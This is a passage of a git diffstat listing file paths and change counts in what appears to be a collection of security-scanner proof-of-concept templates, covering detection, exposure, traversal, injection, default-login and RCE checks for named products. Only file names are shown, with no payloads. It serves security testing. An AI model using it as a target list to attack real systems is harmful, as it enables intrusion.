30 +- poc/detect/wordpress-themes-detect-11316.yaml | 17 +- poc/detect/wordpress-themes-detect.yaml | 22 +- poc/detect/worksites-detection-11384.yaml | 14 +- ...on.yaml => worksites-detection-11385.yaml} | 0 poc/detect/wowza-streaming-detect.yaml | 3 +- .../wp-xmlrpc-pingback-detection-11627.yaml | 2 +- poc/detect/wuzhicms-detect-11655.yaml | 20 +- poc/detect/wuzhicms-detect.yaml | 24 - poc/detect/yapi-detect-11720.yaml | 21 + poc/detect/yapi-detect-11721.yaml | 11 +- poc/detect/zentao-detect-11785.yaml | 23 - poc/detect/zentao-detect-11787.yaml | 26 + poc/detect/zentao-detect.yaml | 3 - poc/detect/zm-system-log-detect-11833.yaml | 21 - poc/detect/zm-system-log-detect-11834.yaml | 25 + poc/detect/zm-system-log-detect.yaml | 9 +- .../carel-bacnet-gateway-traversal-858.yaml | 29 + .../carel-bacnet-gateway-traversal.yaml | 27 - .../digitalrebar-traversal-6997.yaml | 15 +- .../digitalrebar-traversal.yaml | 33 - ...ingframework-directory-traversal-7174.yaml | 19 + ...ingframework-directory-traversal-7175.yaml | 19 +- .../elfinder-path-traversal-7203.yaml | 37 + ...ml => finereport-path-traversal-7476.yaml} | 0 .../finereport-path-traversal-7477.yaml | 13 +- .../flir-path-traversal-7519.yaml | 26 + .../flir-path-traversal-7521.yaml | 20 - ...bm-infoprint-directory-traversal-8098.yaml | 29 +- .../natshell-path-traversal-9006.yaml | 5 +- .../natshell-path-traversal.yaml | 29 + ...inx-merge-slashes-path-traversal-9105.yaml | 34 + .../nginx-merge-slashes-path-traversal.yaml | 28 - .../oa-tongda-path-traversal-9179.yaml | 34 - .../oa-tongda-path-traversal.yaml | 5 +- poc/directory_listing/path-traversal.yaml | 203 +- .../pmb-directory-traversal-9613.yaml | 29 - .../pmb-directory-traversal.yaml | 19 + .../tpshop-directory-traversal-10821.yaml | 19 - .../tpshop-directory-traversal-10822.yaml | 20 + .../tpshop-directory-traversal-10823.yaml | 9 +- .../wooyun-path-traversal-11229.yaml | 26 + .../wooyun-path-traversal-11230.yaml | 3 +- .../wooyun-path-traversal-11232.yaml | 27 - poc/docker/amazon-docker-config-280.yaml | 28 - .../amazon-docker-config-disclosure-278.yaml | 18 - .../amazon-docker-config-disclosure.yaml | 12 +- poc/docker/amazon-docker-config.yaml | 18 + .../aws-ecs-container-agent-tasks-640.yaml | 25 + poc/docker/docker-compose-config-7058.yaml | 7 +- poc/docker/docker-compose-config-7059.yaml | 26 + poc/docker/docker-compose-config-7060.yaml | 4 - poc/docker/dockercfg-config-7056.yaml | 35 + poc/docker/dockercfg-config.yaml | 32 - .../kubernetes-enterprise-manager-8529.yaml | 21 + .../kubernetes-enterprise-manager-8530.yaml | 25 - poc/docker/kubernetes-enterprise-manager.yaml | 18 +- ...ernetes-kustomization-disclosure-8532.yaml | 23 +- ...ernetes-kustomization-disclosure-8533.yaml | 28 - poc/docker/kubernetes-metrics-8536.yaml | 7 +- poc/docker/kubernetes-metrics.yaml | 26 - poc/docker/kubernetes-mirantis-8538.yaml | 23 - poc/docker/kubernetes-mirantis-8540.yaml | 4 +- poc/docker/kubernetes-pods-8542.yaml | 26 + poc/docker/kubernetes-pods-8544.yaml | 2 +- poc/docker/kubernetes-pods-8546.yaml | 30 - ...-unauth(1).yaml => kubernetes-unauth.yaml} | 0 poc/docker/misconfigured-docker-8902.yaml | 8 +- ...all-7107.yaml => drupal-install-7105.yaml} | 0 ...x.yaml => drupal-user-enum-ajax-7109.yaml} | 0 poc/drupal/drupal-user-enum-ajax-7110.yaml | 45 + .../drupal-user-enum-redirect-7112.yaml | 6 +- .../drupal-user-enum-redirect-7114.yaml | 33 - .../drupal-user-enum-redirect-7115.yaml | 31 + poc/elk/elasticsearch-7193.yaml | 22 - .../elasticsearch-sql-client-detect-7190.yaml | 23 + poc/elk/elasticsearch-sql-client-detect.yaml | 21 + poc/elk/exposed-kibana-7319.yaml | 17 +- poc/elk/kibana-panel-8485.yaml | 22 + poc/elk/kibana-panel-8486.yaml | 38 +- poc/exposed/active-admin-exposure-41.yaml | 25 - poc/exposed/active-admin-exposure-42.yaml | 4 +- poc/exposed/active-admin-exposure-43.yaml | 18 + .../adobe-connect-username-exposure-100.yaml | 27 - ...> adobe-connect-username-exposure-98.yaml} | 0 .../airflow-configuration-exposure-230.yaml | 28 - .../airflow-configuration-exposure.yaml | 16 + .../amazon-docker-config-disclosure-278.yaml | 18 - .../amazon-docker-config-disclosure.yaml | 12 +- poc/exposed/ambari-exposure-291.yaml | 27 - poc/exposed/ambari-exposure-293.yaml | 26 + poc/exposed/ambari-exposure.yaml | 17 +- .../android-debug-database-exposed-314.yaml | 24 + .../android-debug-database-exposed-315.yaml | 4 +- .../ansible-config-disclosure-326.yaml | 28 + poc/exposed/ansible-config-disclosure.yaml | 16 - poc/exposed/ansible-tower-exposure-329.yaml | 40 + poc/exposed/ansible-tower-exposure-332.yaml | 19 - poc/exposed/ansible-tower-exposure.yaml | 20 +- poc/exposed/appspec-yml-disclosure-528.yaml | 3 +- poc/exposed/appspec-yml-disclosure-529.yaml | 38 + poc/exposed/avtech-dvr-exposure-614.yaml | 5 +- poc/exposed/avtech-dvr-exposure-616.yaml | 26 - poc/exposed/avtech-dvr-exposure-617.yaml | 26 + .../axiom-digitalocean-key-exposure-666.yaml | 41 - ... axiom-digitalocean-key-exposure-668.yaml} | 0 ...ml => beward-ipcamera-disclosure-715.yaml} | 0 .../beward-ipcamera-disclosure-717.yaml | 28 - .../caucho-resin-info-disclosure-871.yaml | 27 + ...yaml => caucho-resin-info-disclosure.yaml} | 0 poc/exposed/cisco-meraki-exposure-944.yaml | 25 + poc/exposed/cisco-meraki-exposure-946.yaml | 26 - poc/exposed/cisco-smi-exposure-971.yaml | 33 + poc/exposed/cisco-smi-exposure-972.yaml | 11 +- .../clockwork-dashboard-exposure-1014.yaml | 31 + .../commax-credentials-disclosure-1158.yaml | 7 +- .../comtrend-password-exposure-1166.yaml | 7 +- .../coremail-config-disclosure-1215.yaml | 28 - .../coremail-config-disclosure-1216.yaml | 23 + poc/exposed/coremail-config-disclosure.yaml | 16 +- poc/exposed/couchdb-exposure-1238.yaml | 25 - poc/exposed/couchdb-exposure-1239.yaml | 24 + poc/exposed/couchdb-exposure-1241.yaml | 1 + poc/exposed/credential-exposure-file.yaml | 721 - poc/exposed/credentials-disclosure-1256.yaml | 4139 +- ...-1252.yaml => credentials-disclosure.yaml} | 0 poc/exposed/django-debug-exposure-csrf.yaml | 17 +- poc/exposed/druid-console-exposure-7092.yaml | 2 +- poc/exposed/druid-console-exposure.yaml | 18 +- poc/exposed/dwsync-exposure.yaml | 8 +- poc/exposed/exposed-alps-spring-7284.yaml | 29 - poc/exposed/exposed-alps-spring-7285.yaml | 32 + poc/exposed/exposed-alps-spring.yaml | 16 +- .../exposed-authentication-asmx-7288.yaml | 7 +- poc/exposed/exposed-authentication-asmx.yaml | 20 + poc/exposed/exposed-bitkeeper-7292.yaml | 9 +- poc/exposed/exposed-darcs-7298.yaml | 15 +- poc/exposed/exposed-gitignore-7303.yaml | 11 +- poc/exposed/exposed-gitignore-7305.yaml | 36 - poc/exposed/exposed-glances-api-7307.yaml | 6 +- poc/exposed/exposed-glances-api-7308.yaml | 29 - poc/exposed/exposed-glances-api-7309.yaml | 27 - poc/exposed/exposed-hg-7312.yaml | 33 - .../exposed-jquery-file-upload-7315.yaml | 19 +- poc/exposed/exposed-jquery-file-upload.yaml | 22 - poc/exposed/exposed-kibana-7319.yaml | 17 +- poc/exposed/exposed-mysql-initial-7322.yaml | 7 +- poc/exposed/exposed-mysql-initial.yaml | 21 - poc/exposed/exposed-nomad-7329.yaml | 25 - poc/exposed/exposed-prometheus-log-7333.yaml | 24 + poc/exposed/exposed-prometheus-log.yaml | 48 +- poc/exposed/exposed-redis-7336.yaml | 31 - poc/exposed/exposed-redis-7337.yaml | 7 +- poc/exposed/exposed-service-now-7340.yaml | 10 +- poc/exposed/exposed-service-now-7342.yaml | 27 - poc/exposed/exposed-service-now-7343.yaml | 27 + poc/exposed/exposed-svn-7351.yaml | 23 + poc/exposed/exposed-svn-7352.yaml | 23 - poc/exposed/exposed-zookeeper-7365.yaml | 19 +- poc/exposed/exposed-zookeeper.yaml | 22 - .../fanruanoa2012-disclosure-7389.yaml | 16 +- .../fanruanoa2012-disclosure-7390.yaml | 8 +- .../firebase-config-exposure-7487.yaml | 30 + ...485.yaml => firebase-config-exposure.yaml} | 0 ...ure-7511.yaml => flink-exposure-7509.yaml} | 0 poc/exposed/flink-exposure.yaml | 19 +- .../ftp-credentials-exposure-7568.yaml | 37 - poc/exposed/ftp-credentials-exposure.yaml | 22 + ... => github-workflows-disclosure-7665.yaml} | 0 poc/exposed/gogs-install-exposure-7755.yaml | 25 - poc/exposed/hadoop-exposure.yaml | 20 +- .../hp-ilo-serial-key-disclosure-8024.yaml | 4 - .../hp-ilo-serial-key-disclosure-8025.yaml | 37 + poc/exposed/ibm-friendly-path-exposure.yaml | 3 +- poc/exposed/iceflow-vpn-disclosure-8127.yaml | 41 + poc/exposed/iceflow-vpn-disclosure-8128.yaml | 82 +- .../iis-internal-ip-disclosure-8149.yaml | 40 - poc/exposed/iotawatt-app-exposure-8186.yaml | 23 +- ...e.yaml => iotawatt-app-exposure-8187.yaml} | 0 poc/exposed/java-melody-exposed-8222.yaml | 10 +- poc/exposed/java-melody-exposed-8223.yaml | 31 + ...l => jfrog-unauth-build-exposed-8299.yaml} | 0 ...yaml => jolokia-info-disclosure-8359.yaml} | 0 ...ernetes-kustomization-disclosure-8532.yaml | 23 +- ...ernetes-kustomization-disclosure-8533.yaml | 28 - ...n-network-credentials-disclosure-8556.yaml | 32 + .../kyan-network-credentials-disclosure.yaml | 12 +- poc/exposed/lvmeng-uts-disclosure-8680.yaml | 8 +- poc/exposed/lvmeng-uts-disclosure-8681.yaml | 32 + poc/exposed/magento-2-exposed-api-8687.yaml | 21 +- poc/exposed/magento-2-exposed-api-8688.yaml | 9 +- poc/exposed/magento-config-disclosure.yaml | 50 - poc/exposed/monitorix-exposure-8929.yaml | 26 - poc/exposed/monitorix-exposure-8933.yaml | 28 + poc/exposed/netgear-router-exposure-9030.yaml | 8 +- poc/exposed/netgear-router-exposure-9031.yaml | 10 +- .../openbmcs-secret-disclosure-9260.yaml | 36 + poc/exposed/openbmcs-secret-disclosure.yaml | 24 - .../oracle-ebs-sqllog-disclosure-9370.yaml | 21 +- .../oracle-ebs-sqllog-disclosure-9371.yaml | 30 - poc/exposed/pgadmin-exposure-9490.yaml | 27 - poc/exposed/pgadmin-exposure-9491.yaml | 26 + poc/exposed/php-user-ini-disclosure-9561.yaml | 4 + .../pmb-local-file-disclosure-9619.yaml | 8 +- .../pmb-local-file-disclosure-9620.yaml | 28 +- .../putty-private-key-disclosure-9731.yaml | 22 + .../putty-private-key-disclosure-9732.yaml | 26 - poc/exposed/putty-private-key-disclosure.yaml | 28 +- poc/exposed/pyproject-disclosure-9738.yaml | 26 + ...re-9737.yaml => pyproject-disclosure.yaml} | 0 poc/exposed/qihang-media-disclosure-9765.yaml | 3 +- ...> rails-secret-token-disclosure-9810.yaml} | 0 .../rocketmq-console-exposure-9892.yaml | 14 + .../rocketmq-console-exposure-9894.yaml | 14 - poc/exposed/roundcube-log-disclosure.yaml | 46 +- .../ruijie-information-disclosure-9932.yaml | 3 +- ...0138.yaml => selenium-exposure-10137.yaml} | 0 poc/exposed/selenium-exposure.yaml | 16 +- .../sensitive-storage-exposure-10143.yaml | 29 - .../sensitive-storage-exposure-10144.yaml | 30 + poc/exposed/sensitive-storage-exposure.yaml | 3 +- poc/exposed/setup-page-exposure-10181.yaml | 20 - poc/exposed/setup-page-exposure.yaml | 3 - ...=> snyk-ignore-file-disclosure-10347.yaml} | 0 .../snyk-ignore-file-disclosure-10349.yaml | 7 +- poc/exposed/solr-exposure-10363.yaml | 14 - poc/exposed/solr-exposure-10364.yaml | 24 + poc/exposed/solr-exposure.yaml | 16 +- ...kphp-509-information-disclosure-10753.yaml | 25 + .../thinkphp-509-information-disclosure.yaml | 21 +- poc/exposed/thumbs-db-disclosure-10761.yaml | 21 + poc/exposed/thumbs-db-disclosure-10762.yaml | 3 + poc/exposed/thumbs-db-disclosure-10763.yaml | 23 - .../tugboat-config-exposure-10843.yaml | 19 +- .../tugboat-config-exposure-10844.yaml | 37 + .../watchguard-credentials-disclosure.yaml | 33 - ...press-wpcourses-info-disclosure-11367.yaml | 31 - ...press-wpcourses-info-disclosure-11369.yaml | 31 + ...press-wpcourses-info-disclosure-11370.yaml | 37 +- ...press-wpcourses-info-disclosure-11371.yaml | 6 +- .../wp-full-path-disclosure-11455.yaml | 16 - .../wp-full-path-disclosure-11457.yaml | 18 + poc/exposed/wp-full-path-disclosure.yaml | 6 +- .../wp-mailchimp-log-exposure-11492.yaml | 13 +- .../wp-mailchimp-log-exposure-11494.yaml | 11 +- ....yaml => yarn-manager-exposure-11733.yaml} | 0 poc/exposed/zipkin-exposure.yaml | 20 +- poc/extract/extract-urls-7370.yaml | 24 - poc/favicon/favicon-detection-7443.yaml | 2637 + poc/ftp/crush-ftp-login-1273.yaml | 22 - poc/ftp/crush-ftp-login-1275.yaml | 23 + poc/ftp/crush-ftp-login.yaml | 3 +- poc/ftp/ftp-credentials-exposure-7568.yaml | 37 - poc/ftp/ftp-credentials-exposure.yaml | 22 + poc/ftp/ftp-default-credentials.yaml | 55 +- poc/ftp/ftp-default-creds.yaml | 30 - poc/ftp/ftp-weak-credentials-7569.yaml | 18 +- poc/ftp/ftp-weak-credentials.yaml | 23 +- poc/ftp/ftpconfig-7565.yaml | 32 - poc/ftp/ftpconfig.yaml | 27 + poc/ftp/proftpd-config-9667.yaml | 34 + poc/ftp/proftpd-config.yaml | 20 - poc/ftp/solarwinds-servuftp-detect-10360.yaml | 5 - poc/ftp/solarwinds-servuftp-detect.yaml | 15 +- poc/ftp/unauth-ftp-10940.yaml | 9 +- poc/ftp/unauth-ftp-10941.yaml | 2 +- poc/ftp/vsftpd-detection-11074.yaml | 3 +- poc/ftp/vsftpd-detection-11076.yaml | 17 - poc/ftp/vsftpd-detection.yaml | 6 +- poc/ftp/web-ftp-detect-11137.yaml | 43 +- poc/ftp/web-ftp-detect-11138.yaml | 5 +- .../wordpress-updraftplus-pem-key-11325.yaml | 4 + poc/fuzz/adminer-panel-fuzz-73.yaml | 11 +- poc/fuzz/adminer-panel-fuzz.yaml | 11 +- poc/fuzz/{fuzz-query.yaml => fuzz-mode.yaml} | 0 poc/fuzz/lfi-linux-fuzz.yaml | 78 + poc/fuzz/linux-lfi-fuzz.yaml | 30 +- ...0xlfifuzz1.yaml => linux-lfi-fuzzing.yaml} | 0 poc/gcloud/gcp-service-account-11851.yaml | 16 - poc/gcloud/gcp-service-account-7575.yaml | 16 + poc/gcloud/gcp-service-account.yaml | 7 +- poc/git/api-gitlab-431.yaml | 9 +- poc/git/{api-gitlab.yaml => api-gitlab.yml} | 0 .../axiom-digitalocean-key-exposure-666.yaml | 41 - ... axiom-digitalocean-key-exposure-668.yaml} | 0 poc/git/digitalrebar-traversal-6997.yaml | 15 +- poc/git/digitalrebar-traversal.yaml | 33 - poc/git/exposed-gitignore-7303.yaml | 11 +- poc/git/exposed-gitignore-7305.yaml | 36 - poc/git/git-config-7633.yaml | 26 - poc/git/git-config-7638.yaml | 31 + poc/git/git-config-nginxoffbyslash-7628.yaml | 38 + poc/git/git-config-nginxoffbyslash-7632.yaml | 21 +- poc/git/git-credentials-7643.yaml | 24 - poc/git/git-credentials-7644.yaml | 24 + poc/git/gitbook-detect.yaml | 2 +- poc/git/gitea-login-7646.yaml | 9 +- poc/git/github-enterprise-detect-7649.yaml | 19 - poc/git/github-gemfile-files-7653.yaml | 36 - ...es-7652.yaml => github-gemfile-files.yaml} | 0 poc/git/github-page-config-7655.yaml | 4 +- poc/git/github-page-config.yaml | 26 - poc/git/github-personal-token.yaml | 7 +- poc/git/github-takeover-7658.yaml | 7 +- ... => github-workflows-disclosure-7665.yaml} | 0 poc/git/gitlab-api-user-enum-7668.yaml | 33 + poc/git/gitlab-api-user-enum-7669.yaml | 13 +- poc/git/gitlab-api-user-enum.yaml | 11 +- poc/git/gitlab-detect-7670.yaml | 18 +- poc/git/gitlab-public-repos-7675.yaml | 29 - poc/git/gitlab-public-repos-7678.yaml | 8 +- poc/git/gitlab-public-repos-7679.yaml | 6 +- poc/git/gitlab-public-signup-7681.yaml | 31 + poc/git/gitlab-public-signup-7684.yaml | 7 +- poc/git/gitlab-public-signup.yaml | 11 +- ....yaml => gitlab-public-snippets-7685.yaml} | 0 poc/git/gitlab-public-snippets-7690.yaml | 35 - poc/git/gitlab-rce-7693.yaml | 16 +- poc/git/gitlab-rce.yaml | 56 + .../gitlab-uninitialized-password-7695.yaml | 17 +- poc/git/gitlab-user-enum-7699.yaml | 5 +- poc/git/gitlab-user-enum-7700.yaml | 30 - poc/git/gitlab-user-enumeration-7697.yaml | 38 - poc/git/gitlab-user-enumeration-7698.yaml | 38 + poc/git/gitlab-user-enumeration.yaml | 23 +- poc/git/gitlab-weak-login-7705.yaml | 51 + poc/git/gitlab-weak-login-7706.yaml | 11 +- poc/git/gitlab-weak-login-7707.yaml | 12 +- poc/git/metadata-digitalocean-8817.yaml | 13 +- poc/git/metadata-digitalocean-8818.yaml | 43 - poc/git/wordpress-git-config-11279.yaml | 3 +- poc/google/google-api-7771.yaml | 16 - poc/google/google-bucket-service-7775.yaml | 20 +- poc/google/google-bucket-service.yaml | 21 + ...gin.yaml => google-earth-dlogin-7780.yaml} | 0 poc/google/google-earth-dlogin-7781.yaml | 17 +- .../google-secrets.yaml} | 0 poc/google/google-storage.yaml | 17 - poc/google/metadata-google-8819.yaml | 4 +- poc/google/metadata-google-8820.yaml | 13 +- poc/graphite/graphite-browser.yaml | 19 +- poc/graphql/graphql-array-batching-7827.yaml | 14 +- poc/graphql/graphql-array-batching.yaml | 43 + poc/graphql/graphql-detect-7831.yaml | 158 - poc/graphql/graphql-detect-7832.yaml | 159 +- .../graphql-field-suggestion-7833.yaml | 10 +- poc/graphql/graphql-field-suggestion.yaml | 40 - .../hasura-graphql-psql-exec-7902.yaml | 36 - poc/graphql/hasura-graphql-psql-exec.yaml | 42 + poc/graphql/hasura-graphql-ssrf-7904.yaml | 3 +- poc/graphql/hasura-graphql-ssrf-7905.yaml | 47 - poc/header/header-command-injection-7919.yaml | 17 +- poc/header/header_blind_xss-7914.yaml | 14 +- poc/header/host-header-injection-8002.yaml | 31 +- poc/header/hostheaderpoisoning.yaml | 1 - .../http-missing-security-headers-8058.yaml | 170 +- poc/header/http-missing-security-headers.yaml | 115 + poc/header/log4j-all-headers.yaml | 286 - .../oob-header-based-interaction-9249.yaml | 8 +- ...=> oob-header-based-interaction-9250.yaml} | 0 poc/header/sqliheader.yaml | 25 - poc/http/default-lighttpd-page-6867.yaml | 3 - ...cd-unauthenticated-api-data-leak-8056.yaml | 26 +- ...tp-etcd-unauthenticated-api-data-leak.yaml | 36 +- .../http-missing-security-headers-8058.yaml | 170 +- poc/http/http-missing-security-headers.yaml | 115 + .../{http-raw.yaml => http-raw-multiple.yaml} | 0 poc/http/httpbin-open-redirect-8047.yaml | 36 + poc/http/httpbin-open-redirect.yaml | 19 - poc/http/httpbin-xss-8052.yaml | 28 - poc/http/httpbin-xss.yaml | 15 + poc/http/ibm-http-server-8096.yaml | 5 +- poc/http/ibm-http-server.yaml | 25 - poc/http/lighttpd-default-8627.yaml | 19 - poc/http/oracle-http-server-12c-9383.yaml | 4 +- poc/http/oracle-http-server-12c-9384.yaml | 3 +- poc/http/oracle-httpserver12c.yaml | 9 +- poc/http/springboot-httptrace-10467.yaml | 13 +- poc/http/springboot-httptrace-10468.yaml | 43 - .../ibm-advanced-system-management-8090.yaml | 24 + poc/ibm/ibm-advanced-system-management.yaml | 20 +- poc/ibm/ibm-friendly-path-exposure.yaml | 3 +- poc/ibm/ibm-http-server-8096.yaml | 5 +- poc/ibm/ibm-http-server.yaml | 25 - ...bm-infoprint-directory-traversal-8098.yaml | 29 +- poc/ibm/ibm-infoprint-lfi-8105.yaml | 25 +- poc/ibm/ibm-mqseries-default-login-8106.yaml | 51 + poc/ibm/ibm-mqseries-default-login-8107.yaml | 39 - poc/ibm/ibm-note-login-8110.yaml | 23 - poc/ibm/ibm-note-login-8111.yaml | 24 + poc/ibm/ibm-note-login.yaml | 16 +- poc/ibm/ibm-service-assistant-8116.yaml | 24 - poc/ibm/ibm-service-assistant-8118.yaml | 8 +- .../ibm-storage-default-credential-8124.yaml | 12 +- .../ibm-storage-default-credential-8125.yaml | 21 +- poc/injection/GLPI-9.3.3-SQL-Injection.yaml | 19 +- poc/injection/SQLInjection_ERROR.yaml | 90 +- .../buffalo-config-injection-798.yaml | 30 - ...yaml => buffalo-config-injection-801.yaml} | 0 poc/injection/crlf-injection-1260.yaml | 27 - poc/injection/crlf-injection-1262.yaml | 29 + .../duomicms-sql-injection-7122.yaml | 21 + .../duomicms-sql-injection-7125.yaml | 11 +- .../error-based-sql-injection-7249.yaml | 484 - poc/injection/glpi-9.3.3-sql-injection.yaml | 25 + .../header-command-injection-7919.yaml | 17 +- poc/injection/host-header-injection-8000.yaml | 32 - .../host-header-injection-8002.yaml} | 0 .../simple-crm-sql-injection-10278.yaml | 41 + poc/injection/site-map-sql-injection.yaml | 53 +- poc/injection/sql-injection.yaml | 94 +- .../viewlinc-crlf-injection-11014.yaml | 31 - .../viewlinc-crlf-injection-11015.yaml | 6 +- poc/injection/weiphp-sql-injection-11190.yaml | 11 +- ...gyou-u8-RegisterServlet-sql-Injection.yaml | 31 + poc/java/apache-tomcat-snoop-374.yaml | 7 +- poc/java/apache-tomcat-snoop-377.yaml | 25 + .../default-glassfish-server-page-6852.yaml | 17 - poc/java/default-jetty-page-6862.yaml | 9 +- poc/java/default-jetty-page-6864.yaml | 6 +- ...ingframework-directory-traversal-7174.yaml | 19 + ...ingframework-directory-traversal-7175.yaml | 19 +- poc/java/exposed-alps-spring-7284.yaml | 29 - poc/java/exposed-alps-spring-7285.yaml | 32 + poc/java/exposed-alps-spring.yaml | 16 +- poc/java/java-melody-exposed-8222.yaml | 10 +- poc/java/java-melody-exposed-8223.yaml | 31 + poc/java/java-melody-xss.yaml | 2 +- poc/java/java-rmi-detect-8227.yaml | 17 +- poc/java/jboss-seam-debug-page-8239.yaml | 21 - poc/java/jboss-seam-debug-page-8240.yaml | 22 + poc/java/jboss-seam-debug-page.yaml | 13 +- poc/java/jboss-status-8241.yaml | 22 + poc/java/jetty-showcontexts-enable-8295.yaml | 7 +- poc/java/jetty-showcontexts-enable-8297.yaml | 24 + poc/java/jetty-showcontexts-enable-8298.yaml | 23 + poc/java/jinfornet-jreport-lfi-8307.yaml | 19 - poc/java/jinfornet-jreport-lfi.yaml | 14 +- poc/java/public-tomcat-manager-9710.yaml | 11 +- poc/java/public-tomcat-manager-9711.yaml | 10 +- poc/java/shiro-detect-10195.yaml | 18 +- ...ro-detect.yaml => shiro-detect-10196.yaml} | 0 poc/java/springboot-actuator-10433.yaml | 6 +- poc/java/springboot-actuator-10434.yaml | 27 + poc/java/springboot-actuator-10435.yaml | 11 +- ...pringboot-actuators-jolokia-xxe-10429.yaml | 21 +- ...pringboot-actuators-jolokia-xxe-10432.yaml | 33 +- poc/java/springboot-autoconfig-10437.yaml | 1 + poc/java/springboot-autoconfig.yaml | 25 - poc/java/springboot-beans-10438.yaml | 32 - poc/java/springboot-beans-10439.yaml | 33 + poc/java/springboot-beans-10440.yaml | 4 - poc/java/springboot-beans-10441.yaml | 3 +- poc/java/springboot-configprops-10443.yaml | 32 - poc/java/springboot-configprops-10444.yaml | 33 + poc/java/springboot-configprops-10445.yaml | 5 +- poc/java/springboot-dump-10446.yaml | 13 +- ...t-dump-10447.yaml => springboot-dump.yaml} | 0 poc/java/springboot-env-10448.yaml | 31 +- poc/java/springboot-env-10449.yaml | 22 +- poc/java/springboot-gateway-10452.yaml | 29 - poc/java/springboot-gateway-10453.yaml | 30 + poc/java/springboot-gateway.yaml | 3 +- poc/java/springboot-h2-db-rce-10454.yaml | 37 - ...e.yaml => springboot-h2-db-rce-10455.yaml} | 0 ...65.yaml => springboot-heapdump-10461.yaml} | 0 poc/java/springboot-httptrace-10467.yaml | 13 +- poc/java/springboot-httptrace-10468.yaml | 43 - poc/java/springboot-info-10470.yaml | 9 +- poc/java/springboot-log4j-rce-10474.yaml | 32 +- poc/java/springboot-log4j-rce.yaml | 41 - poc/java/springboot-loggers-10475.yaml | 4 +- poc/java/springboot-mappings-10479.yaml | 13 +- poc/java/springboot-metrics-10482.yaml | 29 + poc/java/springboot-metrics-10483.yaml | 13 +- poc/java/springboot-threaddump-10484.yaml | 26 +- poc/java/springboot-threaddump-10487.yaml | 28 +- poc/java/springboot-trace-10490.yaml | 13 +- poc/java/springboot-trace-10492.yaml | 25 +- poc/java/springboot_heapdump.yaml | 43 +- poc/java/struts-problem-report-10563.yaml | 20 + poc/java/struts-problem-report-10564.yaml | 18 +- poc/java/tomcat-default-login-10789.yaml | 103 +- poc/java/tomcat-default-login-10790.yaml | 2 +- poc/java/tomcat-detect-10793.yaml | 4 +- ...omcat-manager-pathnormalization-10796.yaml | 28 - ...omcat-manager-pathnormalization-10797.yaml | 28 +- poc/java/tomcat-scripts-10801.yaml | 8 +- poc/java/tomcat-scripts-10803.yaml | 16 + poc/java/weblogic-weak-login-11156.yaml | 14 +- poc/java/weblogic-weak-login.yaml | 61 - poc/java/webview-addjavascript-interface.yaml | 12 +- poc/java/webview-javascript.yaml | 11 +- poc/java/wildfly-panel-11211.yaml | 6 +- poc/java/wildfly-panel.yaml | 18 +- .../aem-querybuilder-json-servlet-182.yaml | 42 + .../aem-querybuilder-json-servlet-186.yaml | 60 +- .../aem-querybuilder-json-servlet-187.yaml | 16 +- poc/javascript/bower-json-769.yaml | 39 + poc/javascript/bower-json-770.yaml | 2 +- poc/javascript/express-lfr-json (copy 1).yaml | 40 + poc/javascript/express-lfr-json.yaml | 4 +- poc/javascript/fastjson-1-2-41-rce-7404.yaml | 9 +- poc/javascript/fastjson-1-2-41-rce.yaml | 31 + poc/javascript/fastjson-1-2-43-rce-7411.yaml | 17 +- poc/javascript/fastjson-1-2-43-rce-7412.yaml | 12 +- poc/javascript/fastjson-1-2-47-rce-7415.yaml | 53 + poc/javascript/fastjson-1-2-62-rce-7419.yaml | 17 +- poc/javascript/fastjson-1-2-62-rce-7420.yaml | 9 +- poc/javascript/fastjson-1-2-67-rce-7423.yaml | 17 +- poc/javascript/fastjson-1-2-67-rce.yaml | 33 + poc/javascript/fastjson-1-2-68-rce-7425.yaml | 55 - poc/javascript/fastjson-1-2-68-rce.yaml | 19 +- poc/javascript/fastjson-version.yaml | 3 +- poc/javascript/keycloak-json-8473.yaml | 29 + poc/javascript/keycloak-json-8474.yaml | 5 +- poc/javascript/package-json-9423.yaml | 27 +- ...ckage-json-9422.yaml => package-json.yaml} | 0 .../webview-addjavascript-interface.yaml | 12 +- poc/javascript/webview-javascript.yaml | 11 +- .../yonyou-nc-cloud-jsinvoke-rce.yaml | 37 +- poc/jenkins/jenkins-api-panel-8261.yaml | 6 +- poc/jenkins/jenkins-api-panel.yaml | 16 +- poc/jenkins/jenkins-asyncpeople-8268.yaml | 9 +- poc/jenkins/jenkins-asyncpeople-8269.yaml | 22 + poc/jenkins/jenkins-default-8271.yaml | 35 - poc/jenkins/jenkins-default-login.yaml | 42 + poc/jenkins/jenkins-login-8277.yaml | 27 - poc/jenkins/jenkins-login-8279.yaml | 26 + poc/jenkins/jenkins-login.yaml | 12 +- poc/jenkins/jenkins-script.yaml | 3 +- poc/jenkins/jenkins-weak-password.yaml | 87 +- poc/joomla/joomla-com-fabrik-lfi-8370.yaml | 16 +- poc/joomla/joomla-com-fabrik-lfi-8373.yaml | 23 +- poc/joomla/joomla-config-dist-file.yaml | 56 +- poc/joomla/joomla-config-file-8376.yaml | 31 + ...file-8375.yaml => joomla-config-file.yaml} | 0 poc/joomla/joomla-file-listing-8380.yaml | 18 +- poc/joomla/joomla-file-listing.yaml | 30 + poc/joomla/joomla-htaccess-8383.yaml | 8 +- poc/joomla/joomla-panel-8392.yaml | 8 +- .../kafka-center-default-login-8416.yaml | 42 + .../kafka-center-default-login-8417.yaml | 13 +- poc/kafka/kafka-center-login-8418.yaml | 2 +- poc/kafka/kafka-center-login.yaml | 17 +- poc/kafka/kafka-connect-ui-8420.yaml | 17 + poc/kafka/kafka-connect-ui-8423.yaml | 17 - poc/kafka/kafka-consumer-monitor-8424.yaml | 18 + poc/kafka/kafka-consumer-monitor-8425.yaml | 21 - poc/kafka/kafka-consumer-monitor.yaml | 7 +- poc/kafka/kafka-cruise-control-8426.yaml | 18 - poc/kafka/kafka-monitoring-8428.yaml | 2 +- poc/kafka/kafka-monitoring-8430.yaml | 18 - poc/kafka/kafka-monitoring-8431.yaml | 18 + poc/kafka/kafka-topics-ui-8432.yaml | 17 - poc/kafka/kafka-topics-ui-8435.yaml | 17 + poc/kafka/kafka-topics-ui.yaml | 2 +- poc/kong/kong-detect-8499.yaml | 4 +- poc/laravel/laravel-debug-enabled-8574.yaml | 6 +- poc/laravel/laravel-debug-enabled-8576.yaml | 6 +- poc/laravel/laravel-env-8584.yaml | 16 +- poc/laravel/laravel-filemanager-lfi-8587.yaml | 6 +- ...yaml => laravel-filemanager-lfi-8588.yaml} | 0 poc/laravel/laravel-filemanager.yaml | 19 +- poc/laravel/laravel-ignition-xss-8593.yaml | 15 +- poc/laravel/laravel-telescope-8601.yaml | 22 + poc/laravel/laravel.yaml | 12 +- ...yaml => 